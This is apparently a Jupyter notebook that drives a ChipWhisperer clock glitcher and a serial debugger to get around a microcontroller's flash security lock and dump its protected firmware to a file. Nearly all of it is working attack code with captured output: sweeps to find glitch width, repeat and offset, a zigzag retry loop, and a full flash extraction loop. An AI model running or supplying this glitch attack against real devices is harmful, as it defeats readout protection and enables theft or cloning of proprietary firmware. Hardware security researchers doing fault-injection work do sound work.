In [1]:
import time
import serial
import numpy as np
import chipwhisperer as cw
from tqdm.notebook import trange

In [2]:
# connect to ChipWhisperer
scope = cw.scope()
scope.default_setup()

In [3]:
# connect to C2 debugger
dbg = serial.Serial('COM5', timeout=0.1)

In [4]:
# config ChipWhisperer

# Clock
scope.clock.clkgen_freq = 100e6
scope.clock.adc_src = 'clkgen_x1'

# Trigger
scope.trigger.triggers = 'nrst'

# ADC
scope.gain.db = 20
scope.adc.samples = 2000
scope.adc.timeout = 0.1

# Glitch
scope.glitch.clk_src = 'clkgen'
scope.glitch.output = 'glitch_only'
scope.glitch.trigger_src = 'ext_single'
scope.glitch.offset = 1

scope.glitch.resetDcms()

scope.io.glitch_hp = False
scope.io.glitch_lp = True

In [5]:
# auxiliary CW functions
# calculations are valid for 100 MHz clkgen_freq only!

def ext_offset_to_time_us(eo):
    dt = 1/100e6
    cw_trigger_delay = 100e-9
    t = eo * dt + cw_trigger_delay
    return t / 1e-6 # us

def time_us_to_ext_offset(t_us):
    dt = 1/100e6
    cw_trigger_delay = 100e-9
    t = t_us * 1e-6 # s
    return round((t - cw_trigger_delay) / dt)

In [6]:
# auxiliary C2 dbg functions

def reset_and_read():
    dbg.write(b'\n')
    return dbg.read_until(expected=b'\r\n')

def set_read_params(addr, size):
    assert addr >= 0 and addr < 0x10000
    assert size >= 0 and size < 0x100
    s = 'R %04X %02X\n' % (addr, size)
    dbg.write(s.encode('ascii'))
    return dbg.read_until(expected=b'\r\n')

def parse_resp(resp, curr_tc=None):
    resp = resp.decode('ascii').strip('\r\n')
    ll  = resp.split('; ')
    assert len(ll) == 2
    msg = ll[0]
    tc  = int(ll[1].split(' = ')[1], 16)
    if curr_tc != None:
        assert ((curr_tc+1)&0xFFFFFFFF) == tc
    return msg, tc

In [7]:
# check that C2 dbg responds
# for test we will read Security Lock Byte
# "[!] read block error 03" - means that Flash page locked

test_flash_addr = 0xFBFF
test_flash_size = 0x01
set_read_params(test_flash_addr, test_flash_size)
reset_and_read()

b'[!] read block error 03; TC = 000086C4\r\n'

In [8]:
# now we have to find a scope.glitch.repeat that can break normal operation
# scope.glitch.width and scope.glitch.repeat are related parameters
# so let's fix one and try to brute force second
scope.glitch.width = 43 # just select something

repeat_try_min = 1
repeat_try_max = 100
try_count = 50

# glitch will be injected 50 us after trigger
# nothing special about this time, just chip in idle state
scope.glitch.ext_offset = time_us_to_ext_offset(50)

def glitch_with_repeat_count(rep_count, N_try_count):
    scope.glitch.repeat = rep_count
    timeout_resp = '[!] read block error 0D'
    timeout_resp_count = 0 
    for _ in range(N_try_count):
        scope.arm()
        resp, _ = parse_resp(reset_and_read())
        if resp == timeout_resp:
            timeout_resp_count += 1

    return round(timeout_resp_count / N_try_count * 100)


for rep_count in range(repeat_try_min, repeat_try_max):
    reset_rate = glitch_with_repeat_count(rep_count, try_count)
    print('scope.glitch.repeat = %d gives %d%% reset rate' % (rep_count, reset_rate))
    if reset_rate > 90:
        break

scope.glitch.repeat = 1 gives 0% reset rate
scope.glitch.repeat = 2 gives 0% reset rate
scope.glitch.repeat = 3 gives 0% reset rate
scope.glitch.repeat = 4 gives 0% reset rate
scope.glitch.repeat = 5 gives 0% reset rate
scope.glitch.repeat = 6 gives 0% reset rate
scope.glitch.repeat = 7 gives 0% reset rate
scope.glitch.repeat = 8 gives 0% reset rate
scope.glitch.repeat = 9 gives 0% reset rate
scope.glitch.repeat = 10 gives 10% reset rate
scope.glitch.repeat = 11 gives 74% reset rate
scope.glitch.repeat = 12 gives 94% reset rate


In [9]:
# select repeat count
# generic advice here: choose something that disturbs normal chip work, but not too much
# a reset rate from 5% to 40% should be enough

scope.glitch.repeat = ???

In [10]:
# search right glitch offset

ext_offset_try_min = 500  # 5 us
ext_offset_try_max = 2000 # 20 us

def search_glitch_ext_offset(eo_start, eo_end):
    success_resp = '[%04X]' % test_flash_addr
    for eo in trange(eo_start, eo_end):
        scope.glitch.ext_offset = eo
        scope.arm()
        resp, _ = parse_resp(reset_and_read())
        if resp.find(success_resp) >= 0:
            print('scope.glitch.ext_offset = %d gives resp "%s"' % (eo, resp))

search_glitch_ext_offset(ext_offset_try_min, ext_offset_try_max)

  0%|          | 0/1500 [00:00<?, ?it/s]

scope.glitch.ext_offset = 1178 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1180 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1181 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1182 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1183 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1185 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1187 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1188 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1243 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1253 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1545 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1549 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1551 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1552 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1554 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1555 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1556 gives resp "[FBFF] = 82"
scope.glitch.ext_offset = 1557 gives resp "[FBFF

In [11]:
# select ext_offset based on response

succ_ext_offset = ???
scope.glitch.ext_offset = succ_ext_offset

In [16]:
# we can manually check how the selected parameters work
# just run this snippet a few times

scope.arm()
set_read_params(test_flash_addr, test_flash_size)
reset_and_read()

b'[FBFF] = 82; TC = 00008EFD\r\n'

In [17]:
# this function does the main job
# it tries to find ext_offset param for successful glitch in zigzag way
# also returns successful ext_offset, that can be used as feedback

def glitch_read_zigzag(start_ext_offset, glitch_try_count, read_addr, read_size):
    assert read_size > 0 and read_size <= 0x100
    send_read_size = 0x00 if read_size == 0x100 else read_size
    set_read_params(read_addr, send_read_size)
    succ_resp = '[%04X] = ' % read_addr
    
    # just a sanity check so we don't miss any answer
    loop_tc = None

    for i in trange(glitch_try_count):
        eo_off  = i // 2
        eo_sign = 1 if (i % 2) else -1
        eo = start_ext_offset + eo_sign * eo_off
        scope.glitch.ext_offset = eo
        scope.arm()

        resp, loop_tc = parse_resp(reset_and_read(), loop_tc)

        if resp.find(succ_resp) >= 0:
            mem = bytes.fromhex(resp.split(' = ')[1])
            return eo, mem

In [18]:
# Now we are ready to extract Flash content

flash_addr_start = 0x0000
flash_addr_end   = 0xFC00
flash_chunk_size = 0x100
glitch_try_count = 1000

flash_data = b''

t1 = time.time()

curr_eo = succ_ext_offset
for addr in range(flash_addr_start, flash_addr_end, flash_chunk_size):
    print('addr = %04X' % addr)
    curr_eo, mem1 = glitch_read_zigzag(curr_eo, glitch_try_count, addr, flash_chunk_size)
    curr_eo, mem2 = glitch_read_zigzag(curr_eo, glitch_try_count, addr, flash_chunk_size)
    
    # at least two readings must be the same
    while mem1 != mem2:
        print('corrupted data, one more try')
        mem1 = mem2
        curr_eo, mem2 = glitch_read_zigzag(curr_eo, glitch_try_count, addr, flash_chunk_size)

    flash_data += mem2

t2 = time.time()
print('total extraction time = %d seconds' % int(t2 - t1))

addr = 0000


  0%|          | 0/1000 [00:00<?, ?it/s]

  0%|          | 0/1000 [00:00<?, ?it/s]

addr = 0100


  0%|          | 0/1000 [00:00<?, ?it/s]

...

  0%|          | 0/1000 [00:00<?, ?it/s]

addr = FB00


  0%|          | 0/1000 [00:00<?, ?it/s]

  0%|          | 0/1000 [00:00<?, ?it/s]

total extraction time = 102 seconds


In [19]:
with open('flash_data.bin', 'wb') as f:
    f.write(flash_data)

In [20]:
dbg.close()
scope.dis()